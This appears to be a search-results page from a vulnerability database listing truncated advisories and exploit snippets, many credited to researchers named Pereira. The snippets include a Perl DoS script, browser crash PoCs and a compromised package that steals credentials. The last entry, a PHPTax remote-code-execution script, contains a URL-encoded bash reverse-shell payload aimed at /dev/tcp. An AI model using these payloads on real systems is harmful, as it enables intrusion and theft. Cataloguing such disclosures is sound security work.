37 matches found
CVE-2025-57932
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Diego Pereira PowerFolio portfolio-elementor allows Stored XSS. This issue affects PowerFolio: from n/a through <= 3.2.1...
Embedded Malicious Code
Overview Affected versions of this package are vulnerable to Embedded Malicious Code. Compromised versions of this package contain a file called bundle.js that exfiltrates secrets from the user's accounts, including credentials and API tokens. It also downloads malicious files and repackages them...
Embedded Malicious Code
Overview Affected versions of this package are vulnerable to Embedded Malicious Code. Compromised versions of this package contain a file called bundle.js that exfiltrates secrets from the user's accounts, including credentials and API tokens. It also downloads malicious files and repackages them...
mendespereira.com.br Improper Access Control vulnerability OBB-3789924
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...
WordPress Download Monitor plugin <= 4.5.9 - Authenticated Arbitrary File Download vulnerability
Authenticated Arbitrary File Download vulnerability discovered by Thiago Martins, Jorge Buzeti, Leandro Inacio, Lucas de Souza, Matheus Oliveira, Filipe Baptistella, Leonardo Paiva, Jose Thomaz, Joao Maciel, Vinicius Pereira, Geovanni Campos, Hudson Nowak, Guilherme Acerbi in WordPress Download...
See how do I find the value of 3 thousand 6 thousand USD Google RCE vulnerability-vulnerability warning-the black bar safety net
This article tells the story of how Ezequiel Pereira, an 18-year-old student at a Uruguayan public university, found a highest-level Google RCE vulnerability. At the beginning of the year, Ezequiel found a vulnerability in a non-production environment of Google App Engine (GAE), exploi...
FreeVimager 4.1.0 Crash PoC
No description provided by source. !/usr/bin/perl FreeVimager 4.1.0 = WriteAV Arbitrary Code Execution Author: Jean Pascal Pereira Vendor URI: http://www.contaware.com Vendor Description: This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video...
HCView WriteAV Crash PoC
No description provided by source. !/usr/bin/perl Hardcoreview WriteAV Arbitrary Code Execution Author: Jean Pascal Pereira Vendor URI: http://sourceforge.net/projects/hardcoreview/ Vendor Description: Image browser. Designed and created for professional and amateur watching imag...
DomsHttpd <= 1.0 - Remote Denial of Service Exploit
No description provided by source. !/usr/bin/perl DomsHttpd 1.0 = Remote Denial Of Service Exploit Credit: Jean Pascal Pereira Usage: domshttpd.pl host port use strict; use warnings; use IO::Socket; my $host = shift || localhost; my $port = shift || 88; my $sock =...
Internet Explorer 9 XSS Filter Bypass
No description provided by source. Internet Explorer 9 XSS Filter Bypass Discovered by: Jean Pascal Pereira Vendor information: Internet Explorer formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE is a series of graphical web...
CommPort <= 1.01 - Multiple Vulnerabilities
No description provided by source. -------------------------------------------- CommPort 1.01 = SQL Injection Vulnerability -------------------------------------------- Discovered by: Jean Pascal Pereira Vendor information: A 'Community Portal' generator that can be tailored for...
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit
--------------------------------------------------- Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit --------------------------------------------------- Credit: Jean Pascal Pereira Description: Mozilla Firefox is prone to a memory exhaustion vulnerability. The issue has been...
Microsoft Internet Explorer 9.x Stack Exhaustion
---------------------------------------------------------------------- Microsoft Internet Explorer 9.x Vendor: Microsoft Internet Explorer 9.x and below Description: The application is prone to a remote stack overflow vulnerability. Successful exploitation may lead to arbitrary code execution...
DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution
!/usr/bin/perl DIMIN Viewer 5.4.0 Vendor URI: http://www.dimin.net Vendor Description: View images in countless formats, and apply a variety of effects with this small, fast, and powerful application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool and Big Ima...
Internet Explorer 9 Memory Corruption
/ settimelimit0; iniset'memorylimit', '300M'; if!fileexists"junk.htm" $string = ""; fileputcontents"junk.htm", $string; print "View the sourcecode of the iframe below right click - view source: \n"; print "\n"; for$i = 0; $i \n"; / http://0xffe4.org / ?...
Internet Explorer 9 Memory Corruption PoC Exploit
Internet Explorer version 9.0.8112.16421 Memory Corruption PoC Exploit / settimelimit0; iniset'memorylimit', '300M'; if!fileexists"junk.htm" $string = ""; fileputcontents"junk.htm", $string; print "View the sourcecode of the iframe below right click - view source: \n"; print "\n"; for$i = 0; $i...
Internet Explorer 9 XSS Filter Bypass
Internet Explorer 9 XSS Filter Bypass Discovered by: Jean Pascal Pereira Vendor information: "Internet Explorer formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE is a series of graphical web browsers developed by Microsoft and included as part of...
VLC Player 2.0.3 ReadAV Arbitrary Code Execution
!/usr/bin/perl VLC Player 2.0.3 Vendor URI: http://www.videolan.org/vlc/ Vendor Description: VLC is a free and open source cross-platform multimedia player and framework that plays most multimedia files as well as DVD, Audio CD, VCD, and various streaming protocols. Debug Info: Microsoft R Window...
JPEGsnoop 1.5.2 - WriteAV Crash (PoC)
JPEGsnoop 1.5.2 - WriteAV Crash PoC !/usr/bin/perl JPEGsnoop 1.5.2 Vendor URI: http://sourceforge.net/projects/jpegsnoop/ Vendor Description: JPEGsnoop is a detailed JPEG image decoder and analysis tool. It reports all image metadata and can even help identify if an image has been edited. Debug...
PHPTax 0.8 Remote Code Execution
!/usr/bin/env python PHPtax 0.8 " print "Where payload is http://whatever.com/phptax - path to PHPtax with NO trailing /" sys.exit1 banner target = sys.argv1 reverseip = sys.argv2 reverseport = sys.argv3 payload = '%2Fbin%2Fbash%20%3E%26%20%2Fdev%2Ftcp%2F'+reverseip+'%2F'+reverseport+'%200%3E%261...